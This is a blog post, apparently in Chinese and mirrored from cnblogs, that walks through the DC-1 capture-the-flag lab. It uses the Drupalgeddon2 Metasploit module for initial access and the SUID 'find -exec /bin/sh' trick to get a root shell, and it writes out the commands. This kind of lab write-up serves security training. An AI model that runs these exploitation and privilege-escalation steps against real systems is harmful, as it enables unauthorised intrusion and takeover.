zoukankan
html css js c++ java
DC1
1.收集信息
cms信息 使用的是Drupal的cms
端口信息 开开启了22端口,80端口,111端口
目录信息 扫到敏感目录
http://192.168.0.119/robots.txt
通过cewl收集敏感信息并生成字典
cewl http://192.168.0.119 -w passwd.txt
2.漏洞分析与利用
通过robots.txt查看敏感目录内容获取中重要信息
可以从uprgade.txt看出,使用的cms是版本为7.x的Drupal
搜索相关漏洞
进入msfconsle ——> search Drupal
尝试使用最新的,rank为execllent的payload: exploit/unix/webapp/drupal_drupalgeddon2
使用该payload后查看目标是否在可攻击版本范围内
设置攻击目标,得到session会话
3.尝试提权
内核作为最后杀招不得已再用。首先联想到常见几种提权方式,suid提权
python -c 'import pty;pty.spawn("/bin/bash")' #利用python的pty获得一个完整的tty
find / -perm -u=s -type f 2>/dev/null #将有suid权限的打印出来
发现常用于usid提权的工具find
cd /tmp #切换到tmp目录下
touch luojun #创建lj文件
find luojun -exec "whoami" ; #查询lj文件并执行whoami命令
成功发现执行命令的是root权限
find luojun -exec "/bin/bash" ; #将bash的shell反弹出来,发现失败了
find luojun -exec "/bin/sh" ; #将sh的shell反弹出来,发现成功,获得root权限
提权成功,接下来任意妄为寻找flag
查看全文
相关阅读:
SpringMVC,3种不同的URL路由配置方法(这根本不是一个小问题)
PHP在Windows下安装配置第一步
跟我一起学extjs5(18--模块的新增、改动、删除操作)
html image -- data:image/png;base64
oc66--代理模式应用2
oc65--协议应用1,接口.做数据类型限定
oc64--协议2@protocol
oc63--协议@protocol1
oc62--block1
oc61--block
原文地址:https://www.cnblogs.com/sup3rman/p/12389296.html
最新文章
Codeforces Round #300(A.【字符串,多方法】,B.【思维题】,C.【贪心,数学】)
strncmp函数——比较特定长度的字符串
优先队列详解(转载)
Educational Codeforces Round 21 D.Array Division(二分)
Playrix Codescapes Cup (Codeforces Round #413, rated, Div. 1 + Div. 2)(A.暴力,B.优先队列,C.dp乱搞)
libSVM 参数选择
对SVM的个人理解
使用libsvm对MNIST数据集进行实验
降维(二)----Laplacian Eigenmaps
Gabor变换
热门文章
小波变换简介
基于opencv的小波变换
降维(一)----说说主成分分析(PCA)的源头
Li Fei-fei写给她学生的一封信,如何做好研究以及写好PAPER
CSDN-Markdown语法集锦
Codevs1992题解
擦肩而过的那块牌--记ACM_ICPC西安赛区现场赛
9.5 在 C# 中使用 F# 库
Android实战技巧之十九:android studio导出jar包(Module)并获得手机信息
Ubuntu14.04搭建安装svnserver
Copyright © 2011-2022 走看看